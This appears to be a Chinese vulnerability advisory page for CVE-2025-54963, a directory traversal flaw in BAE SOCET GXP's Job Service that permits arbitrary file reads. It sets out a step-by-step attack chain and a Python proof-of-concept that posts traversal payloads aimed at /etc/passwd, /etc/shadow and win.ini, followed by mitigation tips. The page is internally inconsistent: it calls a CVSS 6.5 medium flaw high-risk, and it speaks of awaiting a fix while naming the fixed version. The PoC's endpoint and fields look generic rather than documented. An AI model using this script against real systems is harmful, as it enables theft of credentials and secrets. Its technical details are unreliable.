CVE-2025-54963 CVSS 6.5 中危

CVE-2025-54963 BAE SOCET GXP 目录遍历导致任意文件读取漏洞

披露日期: 2025-10-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-54963

漏洞类型

路径遍历/目录遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BAE SOCET GXP

漏洞概述

CVE-2025-54963是BAE SOCET GXP地理空间开发产品中的一个高危安全漏洞。该漏洞存在于GXP Job Service组件中，由于程序未对用户提交的job请求中的文件路径进行充分的清理和校验，攻击者可以通过构造包含目录遍历序列（如../）的恶意请求，绕过路径限制读取服务器文件系统中的任意文件。在某些配置下，攻击者可能利用此漏洞读取敏感配置文件、凭据文件或其他机密数据，对系统安全造成严重威胁。漏洞影响版本为4.6.0.2之前的版本。

技术细节

该漏洞的根本原因在于GXP Job Service对文件路径的验证不足。当攻击者具有与GXP Job Service交互的权限时，可以提交精心构造的job请求，其中包含目录遍历字符序列。系统未能正确过滤或规范化这些路径，导致攻击者可以访问Web根目录或其他受保护目录之外的文件。例如，攻击者可能通过请求类似../../etc/passwd的路径来读取系统敏感文件。由于GXP Job Service通常以较高权限运行，攻击成功后将获得该进程用户的文件读取权限，可能导致敏感信息泄露。

攻击链分析

STEP 1

攻击者获取GXP Job Service的访问权限或找到可利用的接口

STEP 2

构造包含目录遍历序列的恶意job请求（如../../etc/passwd）

STEP 3

提交crafted job请求到GXP Job Service端点

STEP 4

服务未验证路径合法性，直接处理请求

STEP 5

攻击者接收到请求文件的内容，实现任意文件读取

STEP 6

利用读取的敏感信息（如配置文件、凭据）进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-54963 PoC - Path Traversal in BAE SOCET GXP
# Target: BAE SOCET GXP < 4.6.0.2

target_url = "http://target.com/gxp-job-service/submit"

# Path traversal payload to read sensitive files
payloads = [
    "../../etc/passwd",
    "../../windows/win.ini",
    "../../../etc/shadow",
    "../../../../../../etc/passwd"
]

headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <token>"
}

for payload in payloads:
    data = {
        "job_type": "file_read",
        "file_path": payload,
        "parameters": {
            "encode": False
        }
    }
    
    try:
        response = requests.post(target_url, json=data, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Payload: {payload}")
            print(f"[+] Response: {response.text[:500]}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

影响范围

BAE SOCET GXP < 4.6.0.2

防御指南

临时缓解措施

在官方修复发布前，可通过以下措施临时缓解：1) 限制GXP Job Service的网络访问，仅允许受信任的IP地址访问；2) 监控和过滤包含路径遍历序列的请求；3) 降低Job Service进程的运行权限；4) 配置Web应用防火墙规则阻断目录遍历攻击；5) 定期检查系统日志中的异常文件访问行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表